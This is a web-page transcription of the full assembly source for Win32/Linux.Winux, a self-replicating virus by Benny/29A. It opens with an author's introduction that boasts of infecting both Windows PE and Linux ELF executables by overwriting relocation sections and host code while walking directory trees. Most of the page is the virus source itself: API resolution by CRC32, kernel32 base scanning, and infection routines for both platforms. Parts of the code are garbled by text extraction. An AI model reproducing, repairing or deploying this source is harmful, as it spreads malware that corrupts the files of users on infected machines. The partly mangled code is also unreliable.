Win32.Winux.txt Wed Nov 21 13:30:00 2001 1 ; +-----------------------+ ; : Win32/Linux.Winux : ; +--+----------------+---+ ; : by Benny/29A : ;



Similar documents
Analysis of Win32.Scream

TitanMist: Your First Step to Reversing Nirvana TitanMist. mist.reversinglabs.com

Disassembly of False Positives for Microsoft Word under SCRAP

Systems Design & Programming Data Movement Instructions. Intel Assembly

Computer Organization and Assembly Language

CS412/CS413. Introduction to Compilers Tim Teitelbaum. Lecture 20: Stack Frames 7 March 08

A Tiny Guide to Programming in 32-bit x86 Assembly Language

Complete 8086 instruction set

64-Bit NASM Notes. Invoking 64-Bit NASM

Fighting malware on your own

Abysssec Research. 1) Advisory information. 2) Vulnerable version

OpenBSD Remote Exploit

Abysssec Research. 1) Advisory information. 2) Vulnerable version

REpsych. : psycholigical warfare in reverse engineering. def con 2015 // domas

Software Fingerprinting for Automated Malicious Code Analysis

The Beast is Resting in Your Memory On Return-Oriented Programming Attacks and Mitigation Techniques To appear at USENIX Security & BlackHat USA, 2014

Machine-Level Programming II: Arithmetic & Control

For a 64-bit system. I - Presentation Of The Shellcode

Hacking Techniques & Intrusion Detection. Ali Al-Shemery arabnix [at] gmail

Assembly Language: Function Calls" Jennifer Rexford!

Buffer Overflows. Security 2011

Return-oriented programming without returns

A Museum of API Obfuscation on Win32

Off-by-One exploitation tutorial

Attacking x86 Windows Binaries by Jump Oriented Programming

Overview of IA-32 assembly programming. Lars Ailo Bongo University of Tromsø

CS 16: Assembly Language Programming for the IBM PC and Compatibles

Test Driven Development in Assembler a little story about growing software from nothing

Lecture 7: Machine-Level Programming I: Basics Mohamed Zahran (aka Z)

Using Heap Allocation in Intel Assembly Language

8. MACROS, Modules, and Mouse

Instruction Set Architecture

Self Protection Techniques in Malware

Removing Sentinel SuperPro dongle from Applications and details on dongle way of cracking Shub-Nigurrath of ARTeam Version 1.

CS:APP Chapter 4 Computer Architecture Instruction Set Architecture. CS:APP2e

Heap-based Buffer Overflow Vulnerability in Adobe Flash Player

x64 Cheat Sheet Fall 2015

INTRODUCTION TO MALWARE & MALWARE ANALYSIS

1. General function and functionality of the malware

How Compilers Work. by Walter Bright. Digital Mars

Windows Assembly Programming Tutorial

How To Use A Computer With A Screen On It (For A Powerbook)

CS61: Systems Programing and Machine Organization

Stitching the Gadgets On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection

Assembly Language Tutorial

esrever gnireenigne tfosorcim seiranib

Violating Database - Enforced Security Mechanisms

Syscall Proxying - Simulating remote execution Maximiliano Caceres <maximiliano.caceres@corest.com> Copyright 2002 CORE SECURITY TECHNOLOGIES

Binary Obfuscation from the Top Down. How to make your compiler do your dirty work.

Packers Models. simple. malware. advanced. allocation. decryption. decompression. engine loading. integrity check. DRM Management

About the Tutorial. Audience. Prerequisites. Copyright & Disclaimer

Packers. (5th April 2010) Ange Albertini Creative Commons Attribution 3.0

Harnessing Intelligence from Malware Repositories

Stack Overflows. Mitchell Adair

Phoenix Technologies Ltd.

Introduction to Reverse Engineering

X86-64 Architecture Guide

Lecture 27 C and Assembly

Attacks on Virtual Machine Emulators

Software Vulnerabilities

Title: Bugger The Debugger - Pre Interaction Debugger Code Execution

W4118 Operating Systems. Junfeng Yang

An introduction to the Return Oriented Programming. Why and How

Embedded x86 Programming: Protected Mode

Windows XP SP3 Registry Handling Buffer Overflow

Reversing C++ Paul Vincent Sabanal. Mark Vincent Yason

Cloud Security Is Not (Just) Virtualization Security

風 水. Heap Feng Shui in JavaScript. Alexander Sotirov.

Computer Organization and Architecture

Bypassing Anti- Virus Scanners

CHAPTER 6 TASK MANAGEMENT

Unpacked BCD Arithmetic. BCD (ASCII) Arithmetic. Where and Why is BCD used? From the SQL Server Manual. Packed BCD, ASCII, Unpacked BCD

Character Translation Methods

Intel 8086 architecture

The 80x86 Instruction Set

Bypassing Windows Hardware-enforced Data Execution Prevention

Using MMX Instructions to Convert RGB To YUV Color Conversion

How To Hack The Steam Voip On Pc Orchesterian Moonstone 2.5 (Windows) On Pc/Robert Kruber (Windows 2) On Linux (Windows 3.5) On A Pc

Evaluating a ROP Defense Mechanism. Vasilis Pappas, Michalis Polychronakis, and Angelos D. Keromytis Columbia University

Reverse Engineering Malware Part 1

Hotpatching and the Rise of Third-Party Patches

TODAY, FEW PROGRAMMERS USE ASSEMBLY LANGUAGE. Higher-level languages such

March 2012 White Paper: Police trojan study. Marcin Icewall Noga Sergio de los Santos

Computer Virus Strategies and Detection Methods

612 CHAPTER 11 PROCESSOR FAMILIES (Corrisponde al cap Famiglie di processori) PROBLEMS

Application-Specific Attacks: Leveraging the ActionScript Virtual Machine

Faculty of Engineering Student Number:

Where we are CS 4120 Introduction to Compilers Abstract Assembly Instruction selection mov e1 , e2 jmp e cmp e1 , e2 [jne je jgt ] l push e1 call e

Jorix kernel: real-time scheduling

WLSI Windows Local Shellcode Injection. Cesar Cerrudo Argeniss (

The Plan Today... System Calls and API's Basics of OS design Virtual Machines

Performance monitoring with Intel Architecture

Introduction. Figure 1 Schema of DarunGrim2

Adatbiztonság. Targeted malware. Dr. Bencsáth Boldizsár. adjunktus BME Hálózati Rendszerek és Szolgáltatások Tanszék

There s a kernel security researcher named Dan Rosenberg whose done a lot of linux kernel vulnerability research

High-speed image processing algorithms using MMX hardware

Chapter 4 Processor Architecture

Vigilante: End-to-End Containment of Internet Worms

Hacking the Preboot execution Environment

Inside a killer IMBot. Wei Ming Khoo University of Cambridge 19 Nov 2010

Transcription:

Win32.Winux.txt Wed Nov 21 13:30:00 2001 1 +-----------------------+ : Win32/Linux.Winux : +--+----------------+---+ : by Benny/29A : +----------------+ Heya ppl, lemme introduce you my first multi-platform virus, the worlds first PE/ELF infector. The idea of first Win32/Linux virus came to my head when I was learning Linux viruses. I m not Linux expert, I couldn t code for Linux in assembler - I am familiar with Intel syntax, AT&T is a bit chaotic for me. However, I decided to learn more about Linux coding and left my place of newbee. I was always fascinated of Linux scene and low-level programming under Linux but I never knew much about it. I wanted to code virus for Linux and learn from it. But becoz there already exist some viruses and I knew I won t be able to bring any new technique, I decided to code something unique -> Win32/Linux compatible multi-platform infector. And here you can find the result of my trying. Now, after all, I ve got some valuable experiencez and I m glad for that. Coding/debugging in Linux was hard for me, but I had fun and I learned a lot. And that s the most important. - Technical details - The virus itself ain t much. It s not big, it s not complicated, it s not resident nor polymorphic.. I wanted to be the virus like this. Just to show something new, show that something never seen before is possible and how can it be coded. The virus is devided to two partz: Win32 part and Linux part. Every part is able to infect both of PE and ELF filez. This source is designed to be compiled by TASM under Win32, nevertheless it can infect Linux programz and so then it will be able to be executed in Linux environment (and there it is also able to infect Win32 part, which can be executed in Win32 environment etc etc etc...). Win32 part: ------------ Virus infects PE filez by overwritting.reloc section, so it does not enlarge host file size. Filez that don t have.reloc section, big enough for virus code, can t be infected (explorer.exe can be used to test infection capabilities). It can pass thru directory tree by well known "dotdot" method ("cd..") and there infects all PE and ELF filez - virus does not check extensionz, it analyses victim s internal format and then decidez whata do. When all filez are passed and/or infected virus will execute host code. Linux part: ------------ Virus infects ELF filez by overwritting host code by viral code. The original host code is stored at the end of host file. It can infect all filez (both of PE and ELF) in current directory, also without checking file extensionz. When all filez are passed and/or infected virus will restore host code (overwrite itself by original host code) and execute it. Well, you are probably asking how it is possible that virus can infect Win32 appz from Linux environment and Linux appz from Win32 environment. Yeah, many ppl already asked me. For instance, under some emulator. There exist some emulatorz (win4lin, wine etc..) which are often used to execute Win32 appz under Linux. Also, I know many ppl that have partition specially

Win32.Winux.txt Wed Nov 21 13:30:00 2001 2 reserved for CD burning, where they store both of Win32 and Linux programz. Virus executed from there has no problemz with infection, heh ) Does this virus work? Heh, sure it does. I tested it on Win98, Win2000 and RedHat 7.0, and it worked without any problemz. However, if you will find any problemz, don t by shy and send me a bug report -P - Licence agreement - This virus is covered by GPL - GNU General Public Licence. All crucial facts can be found there. Read it before using! - Last notez - While I was finishing Universe and coding Winux, many personal thingz happened to me. Again such depressive season as only winter can be fell down on me.. I m finishing my high-school, last year, many examz (and I know nothing, you know that feeling, heh :) etc. End of next stage of my life is getting closer and I don t know how will that next one be for me, what it will take and bring to me. I m looking forward to summer, the best season in the year, no depression, no school, no fucking problemz I still have and can t hold them all.. c ya l8r, somewhere in timespace.. +-------------+ : Benny / 29A +-+ : benny@post.cz +---------+ (c) March, 2001 : http://benny29a.cjb.net : Czech Republic +-------------------------+.386p.model flat include win32api.inc include useful.inc include mz.inc include pe.inc.data db?.code Start: ad @SEH_SetupFrame setup SEH frame call gdelta gdelta: pop ebp ebp=delta offset call get_base get K32 base address call get_apis find addresses of APIz lea call f_infect: eax,[ebp + prev_dir - gdelta] eax MAX_PATH [ebp + a_getcurrentdirectorya - gdelta] get current directory 20 pop ecx 20 passes in directory tree ecx

Win32.Winux.txt Wed Nov 21 13:30:00 2001 3 direct action - infect all PE filez in directory lea esi,[ebp + WFD - gdelta] WIN32_FIND_DATA structure esi save its address @sz *.* search for all filez call [ebp + a_findfirstfilea - gdelta] find first file inc eax je e_find quit if not found dec eax eax save search handle to stack f_next: call wcheckinfect infect found file esi save WFD structure dword ptr [esp+4] and search handle from stack call [ebp + a_findnextfilea - gdelta]find next file test eax,eax jne f_next and infect it f_close:call [ebp + a_findclose - gdelta] close search handle e_find: @sz.. mov esi,[ebp + a_setcurrentdirectorya - gdelta] call esi go upper in directory tree pop ecx loop f_infect and again.. lea eax,[ebp + prev_dir - gdelta] eax call esi go back to original directory end_host: @SEH_RemoveFrame remove SEH frame extrn ExitProcess mov eax,offset ExitProcess-400000h original_ep = dword ptr $-4 add eax,400000h image_base = dword ptr $-4 jmp eax and go back to host program INFECT FILE (Win32 version) wcheckinfect Proc ad @SEH_SetupFrame setup SEH frame and dword ptr [ebp + sucelf - gdelta],0 test [esi.wfd_dwfileattributes], FILE_ATTRIBUTE_DIRECTORY jne end_seh discard directory entries xor ecx,ecx cmp [esi.wfd_nfilesizehigh],ecx jne end_seh discard files >4GB mov eax,[esi.wfd_nfilesizelow] cmp eax,4000h jb end_seh discard small filez mov [ebp + l_lseek - gdelta],eax xor lea call inc eax,eax eax FILE_ATTRIBUTE_NORMAL OPEN_EXISTING eax eax GENERIC_READ or GENERIC_WRITE eax,[esi.wfd_szfilename] eax [ebp + a_createfilea - gdelta] open file eax

Win32.Winux.txt Wed Nov 21 13:30:00 2001 4 je end_seh dec eax mov [ebp + hfile - gdelta],eax cdq call cdq xchg jecxz mov edx edx edx PAGE_READWRITE edx eax [ebp + a_createfilemappinga - gdelta] eax,ecx end_cfma [ebp + hmapfile - gdelta],ecx edx edx edx FILE_MAP_WRITE ecx map file to address space call [ebp + a_mapviewoffile - gdelta] xchg eax,ecx jecxz end_mvof mov [ebp + lpfile - gdelta],ecx jmp n_fileopen close_file: 12345678h lpfile = dword ptr $-4 unmap file call [ebp + a_unmapviewoffile - gdelta] end_mvof: 12345678h hmapfile = dword ptr $-4 call [ebp + a_closehandle - gdelta] end_cfma: mov ecx,12345678h was it linux program (ELF)? sucelf = dword ptr $-4 jecxz c_close no, close that file 2 0 0 call dword ptr [ebp + hfile - gdelta] [ebp + a_setfilepointer - gdelta] go to EOF 0 lea eax,[ebp + sucelf - gdelta] eax virtual_end-start 12345678h a_mem = dword ptr $-4 dword ptr [ebp + hfile - gdelta] call [ebp + a_writefile - gdelta] write there orig. program part MEM_RELEASE 0 dword ptr [ebp + a_mem - gdelta] call [ebp + a_virtualfree - gdelta] and deallocate used memory c_close: 12345678h hfile = dword ptr $-4 call [ebp + a_closehandle - gdelta] close file jmp end_seh and quit n_fileopen: call check_elf

Win32.Winux.txt Wed Nov 21 13:30:00 2001 5 je winfectelf is it Linux program (ELF)? add ax,-image_dos_signature jne close_file call check_pe jne close_file is it Win32 program (PE)? important chex cmp word ptr [esi.nt_fileheader.fh_machine],image_file_machine_i386 jne close_file mov ax,[esi.nt_fileheader.fh_characteristics] test ax,image_file_executable_image je close_file test ax,image_file_dll jne close_file test ax,image_file_system jne close_file mov al,byte ptr [esi.nt_fileheader.oh_subsystem] test al,image_subsystem_native jne close_file movzx eax,word ptr [esi.nt_fileheader.fh_numberofsections] dec eax test eax,eax je close_file call header&relocs get PE headerz and check for relocs je close_file quit if no relocs mov ebx,[edi.sh_virtualaddress] cmp eax,ebx jne close_file cmp [edi.sh_sizeofrawdata],virus_end-start+500 jb close_file is it large enough? ad xor mov stosd stosd eax,eax edi,edx erase relocs record call set_alignz align section variable dword ptr [ebp + original_ep - gdelta] dword ptr [ebp + image_base - gdelta] save used variablez mov eax,[esi.nt_optionalheader.oh_addressofentrypoint] mov [esi.nt_optionalheader.oh_addressofentrypoint],ebx mov [ebp + original_ep - gdelta],eax mov eax,[esi.nt_optionalheader.oh_imagebase] mov [ebp + image_base - gdelta],eax set variablez ad mov edi,[edi.sh_pointertorawdata] add edi,[ebp + lpfile - gdelta] lea esi,[ebp + Start - gdelta] mov ecx,virus_end-start rep movsb overwrite relocs by virus body pop dword ptr [ebp + image_base - gdelta] pop dword ptr [ebp + original_ep - gdelta] restore used variablez or dword ptr [edi.sh_characteristics],image_scn_mem_write jmp close_file set flag and quit wcheckinfect EndP INFECT LINUX PROGRAM (Win32 version) winfectelf Proc mov edi,ecx movzx eax,word ptr [edi+12h] cmp eax,3

Win32.Winux.txt Wed Nov 21 13:30:00 2001 6 jne close_file call get_elf get elf headerz p_sectionz: mov eax,[esi+0ch] virtual address add eax,[esi+14h] virtual size cmp ebx,eax jb got_section does EP fit to this section? add esi,edx no, get to next record loop p_sectionz ECX-timez jmp close_file invalid ELF, quit got_section: mov eax,[ebp + Start - gdelta] mov ecx,[esi+10h] add ecx,edi cmp [ecx],eax je close_file infection check mov eax,[esi+14h] cmp eax,virtual_end-start jb close_file must be large enough PAGE_READWRITE MEM_RESERVE or MEM_COMMIT eax 0 call [ebp + a_virtualalloc - gdelta] test eax,eax allocate buffer for host code je close_file mov [ebp + a_mem - gdelta],eax ad mov ecx,[esi+14h] mov esi,[esi+10h] add esi,edi esi xchg eax,edi rep movsb copy host code to our buffer pop edi lea esi,[ebp + Start - gdelta] mov ecx,virtual_end-start rep movsb overwrite host code by virus body add dword ptr [edi+18h],linuxstart-start mov [ebp + sucelf - gdelta],edi jmp close_file set semaphore and quit winfectelf EndP this procedure can rieve API addresses get_apis Proc ad @SEH_SetupFrame lea esi,[ebp + crc32s - gdelta] get ptr to CRC32 values of APIs lea edi,[ebp + a_apis - gdelta] where to store API addresses crc32c how many APIs do we need pop ecx in ECX... g_apis: eax save K32 base call get_api stosd save address test eax,eax je q_gpa quit if not found add esi,4 move to next CRC32 value loop g_apis search for API addresses in a loop end_seh:@seh_removeframe remove SEH frame

Win32.Winux.txt Wed Nov 21 13:30:00 2001 7 restore all registers and quit from procedure q_gpa: @SEH_RemoveFrame jmp end_host quit if error get_apis EndP this procedure can rieve address of given API get_api Proc ad store all registers @SEH_SetupFrame setup SEH frame mov edi,[eax.mz_lfanew] move to PE header add edi,eax... mov ecx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_size] jecxz end_gpa quit if no exports mov ebx,eax add ebx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_virtualaddres s] mov edx,eax get address of export table add edx,[ebx.ed_addressofnames] address of API names mov ecx,[ebx.ed_numberofnames] number of API names mov edi,edx dword ptr [esi] save CRC32 to stack mov ebp,eax xor eax,eax APIname: eax mov esi,ebp get base add esi,[edx+eax*4] move to API name esi save address @endsz go to the end of string sub esi,[esp] get string size mov edi,esi move it to EDI pop esi restore address of API name call CRC32 calculate CRC32 of API name cmp eax,[esp+4] is it right API? je g_name yeah, we got it inc eax increment counter loop APIname and search for next API name end_gpa:xor eax, eax set flag ok_gpa: @SEH_RemoveFrame remove SEH frame mov [esp.pushad_eax],eax save value to stack restore all registers quit from procedure g_name: pop edx mov edx,ebp add edx,[ebx.ed_addressofordinals] movzx eax,word ptr [edx+eax*2] cmp eax,[ebx.ed_numberoffunctions] jae end_gpa-1 mov edx,ebp base of K32 add edx,[ebx.ed_addressoffunctions] address of API functions add ebp,[edx+eax*4] get API function address xchg eax,ebp we got address of API in EAX jmp ok_gpa quit get_api EndP this procedure can rieve base address of K32 get_base Proc ebp store EBP call gdlt get delta offset gdlt: pop ebp to EBP mov eax,12345678h get lastly used address last_kern = dword ptr $-4 call check_kern is this address valid?

Win32.Winux.txt Wed Nov 21 13:30:00 2001 8 jecxz end_gb yeah, we got the address call gb_table jump over the address table dd 077E00000h NT/W2k dd 077E80000h NT/W2k dd 077ED0000h NT/W2k dd 077F00000h NT/W2k dd 0BFF70000h 95/98 gb_table: pop edi get pointer to address table 4 get number of items in the table pop esi to ESI gbloop: mov eax,[edi+esi*4] get item call check_kern is address valid? jecxz end_gb yeah, we got the valid address dec esi decrement ESI test esi,esi end of table? jne gbloop nope, try next item call scan_kern scan the address space for K32 end_gb: pop ebp restore EBP quit check_kern: check if K32 address is valid mov ecx,eax make ECX!= 0 ad store all registers @SEH_SetupFrame setup SEH frame movzx edx,word ptr [eax] get two bytes add edx,-"zm" is it MZ header? jne end_ck nope mov ebx,[eax.mz_lfanew] get pointer to PE header add ebx,eax normalize it mov ebx,[ebx] get four bytes add ebx,-"ep" is it PE header? jne end_ck nope xor ecx,ecx we got K32 base address mov [ebp + last_kern - gdlt],eax save K32 base address end_ck: @SEH_RemoveFrame remove SEH frame mov [esp.pushad_ecx],ecx save ECX restore all registers if ECX == 0, address was found SEH_hndlr macro macro for SEH @SEH_RemoveFrame remove SEH frame restore all registers add dword ptr [ebp + baddr - gdlt],1000h explore next page jmp bck continue execution endm scan_kern: scan address space for K32 bck: ad store all registers @SEH_SetupFrame setup SEH frame mov eax,077000000h starting/last address baddr = dword ptr $-4 movzx edx,word ptr [eax] get two bytes add edx,-"zm" is it MZ header? jne pg_flt nope mov edi,[eax.mz_lfanew] get pointer to PE header add edi,eax normalize it mov ebx,[edi] get four bytes add ebx,-"ep" is it PE header? jne pg_flt nope mov ebx,eax mov esi,eax add ebx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_virtualaddres s] add esi,[ebx.ed_name] mov esi,[esi] add esi,- NREK je end_sk

Win32.Winux.txt Wed Nov 21 13:30:00 2001 9 pg_flt: xor ecx,ecx we got K32 base address mov [ecx],esi generate PAGE FAULT! search again... end_sk: mov [ebp + last_kern - gdlt],eax save K32 base address @SEH_RemoveFrame remove SEH frame mov [esp.pushad_eax],eax save EAX - K32 base get_base EndP restore all registers CRC32: ecx procedure for calculating CRC32s edx at run-time ebx xor ecx,ecx dec ecx mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0edb8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec edi jne NextByteCRC not edx not ecx pop ebx mov eax,edx rol eax,16 mov ax,cx pop edx pop ecx signature db 0, [Win32/Linux.Winux] multi-platform virus by Benny/29A,0 little signature of mine -) Viral entrypoint in Linux programz LinuxStart: eax reserve variable for urn to host ad mov ebx,[esp.cpushad+8] get command line call lgdelta lgdelta:pop ebp ebp=delta offset mov ecx,end_end_lhost-end_lhost sub esp,ecx mov edi,esp lea esi,[ebp + end_lhost - lgdelta] rep movsb copy virus to stack and jump there jmp esp (becoz we need to restore host code back) end_lhost Proc ebx 125

Win32.Winux.txt Wed Nov 21 13:30:00 2001 10 lea ebx,[ebp + Start - lgdelta] and ebx,0fffff000h mov ecx,3000h mov edx,7 int 80h deprotect code section pop ebx 5 xor ecx,ecx int 80h open host file xchg eax,ebx test ebx,ebx jns read_host q_host: xor eax,eax inc eax -1 pop ebx int 80h quit if error read_host: 19 mov ecx,12345678h l_lseek = dword ptr $-4 cdq int 80h seek to saved host code (EOF - some bytez) test eax,eax js q_host ad 5 call cur_dir db.,0 cur_dir:pop ebx xor ecx,ecx cdq int 80h get current directory descriptor xchg eax,ebx inf_dir: 89 lea ecx,[ebp + WFD - lgdelta] int 80h get file from directory xchg eax,ecx jecxz cldir no more filez.. add eax,10 call lcheckinfect try to infect it jmp inf_dir and look for another file cldir: 6 int 80h close directory descriptor 3 lea ecx,[ebp + Start - lgdelta] mov edi,ecx mov edx,virtual_end-start int 80h restore host code test eax,eax js q_host 6 int 80h close host file descriptor add esp,end_end_lhost-end_lhost mov [esp.cpushad],edi write host entrypoint address

Win32.Winux.txt Wed Nov 21 13:30:00 2001 11 and jump to there INFECT FILE (Linux version) lcheckinfect Proc ad xchg eax,ebx 5 cdq inc edx inc edx mov ecx,edx int 80h open file xchg eax,ebx test ebx,ebx jns c_open c_open: mov [ebp + f_handle - lgdelta],ebx 19 xor ecx,ecx int 80h seek to EOF = get file size mov [ebp + l_lseek - lgdelta],eax save it ecx ebx inc ecx ecx inc ecx inc ecx ecx eax xor ecx,ecx ecx mov ebx,esp 90 int 80h map file to address space add esp,24 cmp eax,0fffff000h jbe c_mmap quit if error jmp c_file c_mmap: mov ecx,eax mov [ebp + fm_handle - lgdelta],eax ad call check_elf je linfectelf is it Linux program (ELF)? add ax,-image_dos_signature jne c_mfile call check_pe jne c_mfile is it Win32 program (PE)? some important chex cmp word ptr [esi.nt_fileheader.fh_machine],image_file_machine_i386 jne c_mfile mov ax,[esi.nt_fileheader.fh_characteristics] test ax,image_file_executable_image je c_mfile test ax,image_file_dll jne c_mfile test ax,image_file_system jne c_mfile mov al,byte ptr [esi.nt_fileheader.oh_subsystem] test al,image_subsystem_native jne c_mfile

Win32.Winux.txt Wed Nov 21 13:30:00 2001 12 movzx eax,word ptr [esi.nt_fileheader.fh_numberofsections] dec eax test eax,eax je c_mfile call header&relocs get PE headerz and check for relocs je c_mfile quit if no relocs mov ebx,[edi.sh_virtualaddress] cmp eax,ebx jne c_mfile cmp [edi.sh_sizeofrawdata],virus_end-start+500 jb c_mfile is it large enough? ad xor mov stosd stosd eax,eax edi,edx clear relocs record call set_alignz align section variable mov eax,[esi.nt_optionalheader.oh_addressofentrypoint] mov [esi.nt_optionalheader.oh_addressofentrypoint],ebx mov [ebp + original_ep - lgdelta],eax mov eax,[esi.nt_optionalheader.oh_imagebase] mov [ebp + image_base - lgdelta],eax set some important variablez ad mov edi,[edi.sh_pointertorawdata] add edi,[esp+24] lea esi,[ebp + Start - lgdelta] mov ecx,virus_end-start rep movsb overwrite relocs by virus code or dword ptr [edi.sh_characteristics],image_scn_mem_write set flag c_mfile: 91 int 80h unmap file c_file: 6 mov ebx,[ebp + f_handle - lgdelta] int 80h close file descriptor and quit lcheckinfect EndP INFECT LINUX PROGRAM (Linux version) linfectelf Proc mov edi,ecx movzx eax,word ptr [edi+12h] cmp eax,3 jne c_mfile call get_elf get ELF headerz p_sectionz2: mov eax,[esi+0ch] virtual address add eax,[esi+14h] virtual size cmp ebx,eax jb got_section2 does EP fit to this section? add esi,edx no, get to next record loop p_sectionz2 ECX-timez jmp c_mfile invalid ELF, quit got_section2: mov eax,[ebp + Start - lgdelta]

Win32.Winux.txt Wed Nov 21 13:30:00 2001 13 mov ecx,[esi+10h] add ecx,edi cmp [ecx],eax je c_mfile infection check mov eax,[esi+14h] cmp eax,virtual_end-start jb c_mfile is it large enough? sub esp,eax create buffer in stack mov [ebp + s_mem - lgdelta],eax add dword ptr [edi+18h],linuxstart-start mov ecx,[esi+14h] mov esi,[esi+10h] add esi,edi mov eax,esi mov edi,esp rep movsb copy original host code there mov edi,eax lea esi,[ebp + Start - lgdelta] mov ecx,virtual_end-start rep movsb overwrite host code by virus 91 mov ebx,[ebp + fm_handle - lgdelta] int 80h unmap file 19 mov ebx,[ebp + f_handle - lgdelta] xor ecx,ecx cdq inc edx inc edx int 80h go to EOF 4 mov ecx,esp mov edx,virtual_end-start int 80h write there original host code add esp,[ebp + s_mem - lgdelta] correct stack jmp c_file and close the file linfectelf EndP check if it is Linux program (ELF) check_elf Proc mov eax,[ecx] eax add eax,-464c457fh check_elf EndP check if it is Win32 program (PE) check_pe Proc mov eax,[ecx.mz_lfanew] add eax,ecx xchg eax,esi mov eax,[esi] add eax,-image_nt_signature check_pe EndP

Win32.Winux.txt Wed Nov 21 13:30:00 2001 14 get some variablez and check for relocationz in PE file header&relocs Proc imul eax,eax,image_sizeof_section_header movzx edx,word ptr [esi.nt_fileheader.fh_sizeofoptionalheader] lea edi,[eax+edx+image_sizeof_file_header+4] add edi,esi lea edx,[esi.nt_optionalheader.oh_datadirectory.de_basereloc.dd_virtualaddres s] mov eax,[edx] test eax,eax header&relocs EndP align section variable set_alignz Proc mov eax,virtual_end-start cmp eax,[edi.sh_virtualsize] jb o_vs mov ecx,[esi.nt_optionalheader.oh_sectionalignment] cdq div ecx test edx,edx je o_al inc eax o_al: mul ecx mov [edi.sh_virtualsize],eax o_vs: set_alignz EndP get some important variablez from Linux program (ELF) get_elf Proc mov ebx,[edi+18h] EP mov esi,[edi+20h] section header add esi,edi normalize movzx edx,word ptr [edi+2eh] size of section header movzx ecx,word ptr [edi+30h] number of sectionz get_elf EndP end_end_lhost: end_lhost EndP gpl db This GNU program is covered by GPL.,0 licence agreement -) CRC32s of used APIz crc32s: dd 0AE17EBEFh FindFirstFileA dd 0AA700106h FindNextFileA dd 0C200BE21h FindClose dd 08C892DDFh CreateFileA dd 096B2D96Ch CreateFileMappingA dd 0797B49ECh MapViewOfFile dd 094524B42h UnmapViewOfFile dd 068624A9Dh CloseHandle dd 04402890Eh VirtualAlloc dd 02AAD1211h VirtualFree dd 021777793h WriteFile dd 085859D42h SetFilePointer dd 0EBC6C18Bh GetCurrentDirectoryA dd 0B2DBD7DCh SetCurrentDirectoryA dd 07495B3ADh OutputDebugStringA crc32c = ($-crc32s)/4 number of APIz virus_end:

Win32.Winux.txt Wed Nov 21 13:30:00 2001 15 addresses of APIz a_apis: a_findfirstfilea dd? a_findnextfilea dd? a_findclose dd? a_createfilea dd? a_createfilemappinga dd? a_mapviewoffile dd? a_unmapviewoffile dd? a_closehandle dd? a_virtualalloc dd? a_virtualfree dd? a_writefile dd? a_setfilepointer dd? a_getcurrentdirectorya dd? a_setcurrentdirectorya dd? a_outputdebugstringa dd? f_handle dd? file handle fm_handle dd? file mapping handle s_mem dd? size of host code (for stack manipulatio nz) WFD WIN32_FIND_DATA? WIN32_FIND_DATA structure prev_dir db MAX_PATH dup (?)original directory virtual_end: ends End Start that s all folx, wasn t that kewl? -)

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information